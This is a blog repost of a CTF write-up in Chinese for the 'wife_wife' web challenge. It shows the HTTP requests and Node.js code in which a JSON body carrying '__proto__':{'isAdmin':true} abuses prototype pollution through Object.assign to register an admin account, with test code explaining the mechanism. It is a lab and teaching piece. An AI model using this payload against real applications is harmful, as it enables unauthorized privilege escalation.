wife_wife ctf

已于 2023-06-16 14:33:28 修改
阅读量517 收藏 1
点赞数
文章标签: 网络安全 web安全
于 2023-06-16 11:36:05 首次发布
原文链接:https://github.com/C0nstellati0n/NoobCTF/blob/main/CTF/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/4%E7%BA%A7/Web/wife_wife.md
版权

wife_wife

来源

网站可以登录可以注册,除此之外没别的了。随便注册个用户登录也只能得到假flag。注册界面抓个包,包的格式如下:

POST /register HTTP/1.1
Host: 61.147.171.105:49801
Content-Length: 47
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://61.147.171.105:49801
Referer: http://61.147.171.105:49801/register.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"username":"b","password":"b","isAdmin":false}

直接把false改成true重发是没用的。可以看看github上别人给出的源码

app.post('/register', (req, res) => {
    let user = JSON.parse(req.body)
    if (!user.username || !user.password) {
        return res.json({ msg: 'empty username or password', err: true })
    }
    if (users.filter(u => u.username == user.username).length) {
        return res.json({ msg: 'username already exists', err: true })
    }
    if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
        return res.json({ msg: 'invalid invite code', err: true })
    }
    let newUser = Object.assign({}, baseUser, user) //就是这里,原型链污染
    users.push(newUser)
    res.json({ msg: 'user created successfully', err: false })
})

查阅资料,原来Object.assign也能触发原型链污染。let newUser = Object.assign({}, baseUser, user)的作用是把baseUser和user的属性合并后拷贝到{}中,即newUser是baseUser和user的集合体。baseUser猜测是user类似父类的东西,user应该就是上面的{"username":"b","password":"b","isAdmin":false}部分了。直接bp发包:

POST /register HTTP/1.1
Host: 61.147.171.105:49801
Content-Length: 62
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://61.147.171.105:49801
Referer: http://61.147.171.105:49801/register.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"username":"e","password":"e","__proto__":{"isAdmin":true}}

然后登录注册的用户即可得到flag。内部发生了类似下面的情况:

let baseUser={};
let data='{"username":"e","password":"e","__proto__":{"isAdmin":true}}';
let user= JSON.parse(data);
console.log(user);
console.log(user.isAdmin); //这里输出的是undefined,故不会进入下面的if语句强制将user.isAdmin设为false
let INVITE_CODE="whatever";
if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
}
let newUser = Object.assign({}, baseUser, user) //触发原型链污染
console.log(newUser.isAdmin);

看了这篇文章相信这道题就很简单了。原型链污染不太准确的理解就是“父类影响子类”,一个子类继承于父类后,父类有什么属性子类就有什么属性。比如这里我们的注册信息data按照json的形式传入,JSON.parse后得到一个对象。这个对象有3个键名,username,password和__proto__。比较容易搞混的地方来了,这个__proto__是键名,单纯是个键名,值为{“isAdmin”:true},而不是类的原型对象prototype。这点很重要,如果我们把测试代码稍微修改一下:

let baseUser={};
//let data='{"username":"e","password":"e","__proto__":{"isAdmin":true}}';
//let user= JSON.parse(data);
let user={"username":"e","password":"e","__proto__":{"isAdmin":true}};
console.log(user);
console.log(user.isAdmin); //输出true,导致进入下面的if语句将isAdmin强行改为false
let INVITE_CODE="whatever";
if (user.isAdmin && user.inviteCode != INVITE_CODE) {
        user.isAdmin = false
}
let newUser = Object.assign({}, baseUser, user) //那这里的原型链污染也没用了,子类后定义的属性值会覆盖父类的
console.log(newUser.isAdmin);

这里的user直接就是个类,“__proto__“不是键名,而是类的原型对象prototype。这样就会有两个问题,第一,当console.log(user.isAdmin);尝试读取isAdmin属性时会顺着上去找父类的,得到true,进入if语句强制赋值全部白给;第二,__proto__不是键名,后面Object.assign不会拷贝到newUser上。总之就是记住,原型链污染需要在JSON解析的情况下进行。

最后Object.assign({}, baseUser, user)把user的键全部拷贝给newUser。现在newUser就有isAdmin属性了,还是true,自然就能拿到flag了。

 根据回显可以看出注册管理员用户成功

 登录管理员账号即可获得flag

Flag

CatCTF{test_flag_h0w_c@n_I_l1ve_w1th0ut_nilou}

xiul0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
web | CTF】攻防世界 wife_wife
weixin_46301214的博客
06-06 4199
我暂时没搞明白这题目意义何在,好像跟实战有点偏离的太远了,用JavaScript服务器来处理登录?账号密码不存放数据库?存缓存里?能让所有人注册管理员账号?太扯淡了。
CTF | 网络安全】攻防世界wife_wife解题详析
等风来
07-23 4672
若isAdmin的属性是true,则它为管理员,否则为普通用户;于是我们可构造污染。该题涉及Java Script原型链污染。可以看到,后端编程语言为Node.js,
wifi详解(三)
热门推荐
ylyuanlu的专栏
07-03 3万+
1        WLAN驱动结构介绍 1.1      SDIO驱动 在drivers/mmc下面是mmc卡,SD卡和SDIO卡驱动部分,其中包括host驱动,card驱动和core部分,由于网络接口卡挂接在SDIO总线上,所以在此之前我们先看一下SDIO的驱动结构。其驱动在drivers/mmc目录下的结构为:   |-- mmc |   |-- card |   |-- core
一文搞懂WiFi的所有知识点
qq_42270373的博客
11-15 3893
WiFi名字的由来 Wi-Fi这个术语经常被误以为是指无线保真(Wireless Fidelity),类似历史悠久的音频设备分类:长期高保真(1930年开始采用)或Hi-Fi(1950年开始采用)。即便是Wi-Fi联盟本身也经常在新闻稿和文件中使用“Wireless Fidelity”这个词,事实上,Wi-Fi一词是没有任何意义。 1999年,几家富有远见的公司联合起来组成了一个全球性非营利性协会——无线以太网兼容性联盟(Wireless Ethernet Compatibility All
Wlan与WiFi
u012384954的专栏
11-27 557
首先我们简单介绍下WLAN无线上网,其全称是:Wireless Local Area Networks,中文解释为:无线局域网络,是一种利用射频(Radio Frequency RF)技术进行据传输的系统,该技术的出现绝不是用来取代有线局域网络,而是用来弥补有线局域网络之不足,以达到网络延伸之目的,使得无线局域网络能利用 简单的存取架构让用户透过它,实现无网线、无距离限制的通畅网络。WLAN 使用
WEBWife_wife
32bin的博客
03-22 2557
get flag参考:https://www.rstk.cn/news/25963.html?
【愚公系列】2023年06月 攻防世界-Webwife_wife
时光隧道
06-13 4678
JavaScript原型链污染是一种黑客攻击方式,利用JavaScript中的原型继承链来污染一个对象的原型继承链,从而影响整个应用程序的执行逻辑。攻击者会利用一些漏洞或者不恰当的代码实现,将恶意代码注入到原型对象中,然后通过继承链的方式将恶意代码传递给整个应用程序。攻击者通常将恶意代码注入到全局对象或者重要对象的原型中,例如等,从而污染整个应用程序。jQuery Prototype Pollution漏洞:攻击者通过修改jQuery的方法来污染,使得在后续的代码中,可以在任何位置调用。
攻防世界PWN之Welpwn题解
seaaseesa的博客
11-06 1530
首先用IDA查看 发现主函数不能栈溢出,我们看看echo这个函数 echo会把主函数输入的字符串复制到局部的s2里,并且s2只有16字节,可以造成溢出。Echo函数先循环复制字符到s2,如果遇到0,就结束复制,然后输出s2。因此,我们如果想直接覆盖函数返回地址,那么我们的目标函数必须没有参数,否则,我们用p64(…)包装地址时,必然会出现0。 比如我们的payload为payload...
Bugku CTF 每日一题 想蹭网先解开密码
彼岸花苏陌的博客
02-03 3827
想蹭网先解开密码 学到了新知识和新工具 下载下来是个cap文件 用wireshark打开 由题目得知是wifi的文件,上网学习了一下 wifi的四次握手协议 用eapol搜索wireshark中的文件 确实存在四个包 题目中又有提示要我们猜后面四位 所以了解wifi破解方法后 可以用cap文件加密码文件组合的方式暴力破解 于是有两种方式,一种是kali下的aircrack,第二种是windows下的EWSA 1.aircrack 首先得构建出11位的手机号码密码 因为只用猜后面四位,所以可以用python
CATCTF wife原型链污染
qq_51796436的博客
02-21 953
原型链污染原理:https://drun1baby.github.io/2022/12/29/JavaScript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/如下代码,prototype是newClass类的一个属性。newClass实例化的对象newObj的.__proto__指向newClass类的JSON 解析的情况下,__proto__会被认为是一个真正的“键名”,而不代表“原型”。如果是则__proto__会被认为是o2的原型。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
test_ctf_
09-30
学习java时跟着老师敲的代码,可以帮到一部分初学者
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
万字讲解WiFi为何物
华为云官方博客
11-29 5011
摘要:WiFi是一种基于IEEE802.11系列协议标准实现的无线通信技术。
WiFi、WLAN的区别以及深入探索理解802.11协议
weixin_42295969的博客
05-25 4236
1. WiFi、WLAN与802.11相关背景知识 1.1 WiFi、WLAN与802.11相互之间的关系 1.1.1 定义 WLAN(wireless local network)无线局域网,是一种采用分布式无线电广播ISM (Industrial, Scientific, Medical) 频段将一个区域里面(如学校,家庭)的两个或者多个支持无线协议的设备连接起来的系统。也就是说它就是一个系统通过这些方式进行实现但是并没有去指定用哪些标准去实现。 WLAN的802.11a标准使用5GHz频段,支持的
WiFi4、WiFi5、WiFi6区别?
学海无涯的专栏
04-27 1万+
WiFi6模块和WiFi5模块区别在哪?-融创电子社区 不同wifi版本之间有哪些区别? 802.11b — WiFi 1 (1999) 802.11a — WiFi 2 (1999) 802.11g —WiFi 3 (2003) 802.11n — WiFi 4 (2009) 802.11ac —WiFi 5(2014) 802.11ax —WiFi 6(2018) WiFi3:802.(11a、11b和11g)使用的是20MHZ的频宽; WiFi4:802....
WiFi(Wireless Fidelity)基础(一)
weixin_43153548的博客
05-08 4331
目录 一、基本介绍(Introduction) 二、进化发展(Evolution) 三、PHY帧((PHY Frame ) 四、MAC帧(MAC Frame ) 五、协议(Protocol) 六、安全(Security) 七、802.11ac标准 八、802.11ad标准 九、802.11ax (WiFi 6)标准 十、WiFi直接连接(WiFi Direct) 十一、测试(Testing) 十二、WiFi射频测量(WiFi RF Meas.) https://www.sharetechnote.com/
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了提供一个安全的环境,让参赛选手能够在其中进行攻击和防御的实战训练。 在ctf_awd_platform中,参赛选手将分为多个小队,每个小队都需要同时进行攻击和防御。比赛的过程中,参赛选手需要使用各种技术和工具,对其他小队的系统进行攻击,尝试获取对方的旗帜。同时,参赛选手也需要保护自己的系统,防止其他小队进行攻击并窃取自己的旗帜。 ctf_awd_platform提供了一个仿真的网络环境,模拟了现实世界中的网络系统。参赛选手可以在这个环境中进行攻防实战,通过解决各种网络安全问题来提升自己的技能。 ctf_awd_platform不仅能够帮助参赛选手提升网络攻防技术,还能够提高其团队合作能力和解决问题的能力。在比赛中,参赛选手需要与队友紧密配合,共同制定攻击和防御策略,以获取最佳的比赛成绩。 总体而言,ctf_awd_platform是一个能够帮助参赛选手提升网络安全技术和团队合作能力的AWD平台,通过实战演练来提高参赛选手的技能水平,并为他们在网络安全领域的职业发展打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值